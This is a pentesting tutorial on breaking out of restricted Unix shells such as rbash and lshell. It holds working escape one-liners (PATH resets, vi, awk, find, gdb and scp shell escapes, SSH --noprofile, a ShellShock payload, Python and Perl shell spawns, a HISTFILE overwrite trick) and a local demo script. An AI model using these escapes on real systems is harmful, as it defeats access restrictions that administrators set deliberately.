A Unix shell that restricts some of the capabilities available to an interactive user, such as:
– Using cd to change directories
– Setting or unsetting certain environment variables (e.g. SHELL or PATH)
– Specifying command names containing ‘ / ’ (arguments may still contain slashes)
– Redirecting output using the >, >>, >|, >&, &> operators
– Using certain built-in commands (e.g. enable, or set +r to leave restricted mode)
– And sometimes a lot more…
But… why?
• To provide an additional layer of security
• To restrict usage of the appliance to the limited set of features it was originally designed for (e.g. routers, disk and volume managers, network appliances)
• To “protect” the underlying operating system, sometimes even from system administrators themselves…
• To make life harder for attackers (and pentesters)
Types of restricted shells
• “Real” shell implementations, e.g.
– rbash (bash invoked as rbash, or as bash -r)
– rsh (the restricted Bourne shell, not the remote shell client)
– rksh
• Implementations of shells in <insert your favorite scripting language here>, e.g.
– Python (lshell)
Specific techniques for breaking out:
Step 1: Reconnaissance
• Find out as much as you can about the environment you’re in:
– Run env to see the exported environment variables
– echo $PATH, to find out what PATH is set to (usually one or two specific directories)
– echo $SHELL, to find out which shell we are actually in (generally rbash or rksh); echo $0 shows the running shell even where SHELL has been set to something else
– Try basic Unix commands and see what’s allowed: ls, pwd, cd .., env, set, export, vi, cp, mv
Step 2: Quick Wins
• If ‘ / ’ is allowed in command names, you won!
– Just run /bin/sh
• If you can set the PATH or SHELL variables, you won again!
– export PATH=/bin:/usr/bin:$PATH
– export SHELL=/bin/sh
• If you can copy files into a writable directory on the existing PATH… win!
– cp /bin/sh /some/dir/from/PATH; sh
(rbash only checks the command name for ‘ / ’, so arguments with full paths are fine; the copied sh is then found by its bare name and runs unrestricted)
Step 3: Get to know the wardens
• Do research on all parameters and additional (hidden?) functionality in the commands that are allowed
• Some commands let you execute other system commands, often bypassing the shell restrictions (the child process is started by the tool itself, not by the restricted shell):
– ftp → !/bin/sh
– gdb → !/bin/sh
– more / less / man → !/bin/sh
– vi / vim → :!/bin/sh (or :set shell=/bin/sh followed by :shell)
– scp -S /tmp/getMeOut.sh x y: (-S names the program scp runs to open the connection)
– awk 'BEGIN {system("/bin/sh")}'
– find / -name someName -exec /bin/sh \;
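The quick wins of Step 2 and the tool escapes of Step 3 can be reproduced locally. The script below is an added example, not part of the original slides: it builds a throwaway jail whose PATH holds only a handful of "allowed" tools, spawns a restricted bash (bash -r, the same mode as rbash) and shows which attempts rbash refuses and which break out through a child process. It assumes bash, awk, find and cp are installed and that /bin/sh and /bin/echo exist; the jail directory, the tool list and the ESCAPED-via-* marker strings are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original slides): exercise Step 2/3 attempts against a
# locally spawned restricted bash. Assumes bash, awk, find, cp, /bin/sh and /bin/echo.

BASH_BIN=$(command -v bash)          # resolve now, before PATH is replaced for the jail
JAIL=$(mktemp -d)                    # constructed jail: $JAIL/bin will be the only PATH entry
mkdir -p "$JAIL/bin"
for tool in ls pwd awk find cp; do   # the "allowed" commands the vendor left in the appliance
    src=$(command -v "$tool") && ln -s "$src" "$JAIL/bin/$tool"
done

# Run one command line inside the restricted shell, as a jailed user would type it.
# PATH is the jail directory only; rbash's own "restricted:" errors go to stderr.
in_rbash() {
    env -i PATH="$JAIL/bin" HOME="$JAIL" "$BASH_BIN" -r -c "$1" 2>/dev/null
}

# Status 0 when the restricted shell refused the command outright.
refused() {
    ! in_rbash "$1" >/dev/null
}

# Step 2 as rbash itself enforces it: slash in the command name, cd, and PATH are all blocked.
slash_in_command_name() { refused '/bin/echo should-not-run'; }
change_directory()      { refused 'cd /'; }
reset_path()            { refused 'export PATH=/bin:/usr/bin'; }

# Step 3: awk's system() hands its string to /bin/sh, which never consults rbash's rules.
awk_escape() {
    in_rbash "awk 'BEGIN { system(\"/bin/echo ESCAPED-via-awk\") }'"
}

# Step 3: find -exec starts the program directly; a slash in an *argument* was never forbidden.
find_escape() {
    in_rbash "find $JAIL/bin/ls -exec /bin/echo ESCAPED-via-find \\;"
}

# Step 2, third win: a writable directory on PATH. Copy /bin/sh there, call it by its bare
# name, and the unrestricted copy happily runs full-path commands.
copy_into_path_escape() {
    in_rbash "cp /bin/sh $JAIL/bin/sh && sh -c '/bin/echo ESCAPED-via-cp'"
}

cleanup_jail() { rm -rf "$JAIL"; }

# Stand-alone run: report what each attempt produced.
for attempt in slash_in_command_name change_directory reset_path; do
    "$attempt" && echo "$attempt: refused by rbash"
done
awk_escape
find_escape
copy_into_path_escape
```

Each escape prints its marker only because the binary that finally runs /bin/echo is awk, find or the copied sh, not the restricted shell; rbash's checks apply to the command line it parses, not to what the allowed programs do afterwards.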
Step 4: Help from the outside
• Use SSH from your machine to execute a command before the remote shell is loaded:
– ssh restricted@10.20.30.40 -t "/bin/sh"
• Or start the remote shell without loading the profile / “rc” files (where most of the limitations are often configured):
– ssh restricted@10.20.30.40 -t "bash --noprofile" (add --norc if the restrictions live in ~/.bashrc)
(both work when the restriction is applied by a startup script; a login shell that is rbash itself enforces its rules on the -c command string too)
• Try ShellShock on vulnerable shell implementations (e.g. when sshd forces a command, the client’s string lands in SSH_ORIGINAL_COMMAND and a vulnerable bash parses it as a function definition):
– ssh restricted@10.20.30.40 -t "() { :; }; /bin/bash"
Step 5: Dig deep!
• Write to files using tee (the file name is an argument, so blocked redirection operators don’t matter):
– echo "Your evil code" | tee script.sh
• Invoke a shell through a scripting language:
– python -c 'import os; os.system("/bin/bash")'
– perl -e 'exec "/bin/sh";'
• History file trick:
1) Set the HISTFILE variable to the file you want to overwrite
2) Set the HISTSIZE variable to 0 and then immediately to 100 (this empties the in-memory history, so only the lines you type next are saved)
3) Execute the lines that you want to be written to your file
4) Log out and log back in again. You have overwritten the contents of the file HISTFILE pointed to (and the original file permissions remained the same!)
(newer bash releases also forbid setting HISTFILE in restricted mode, so check the version first)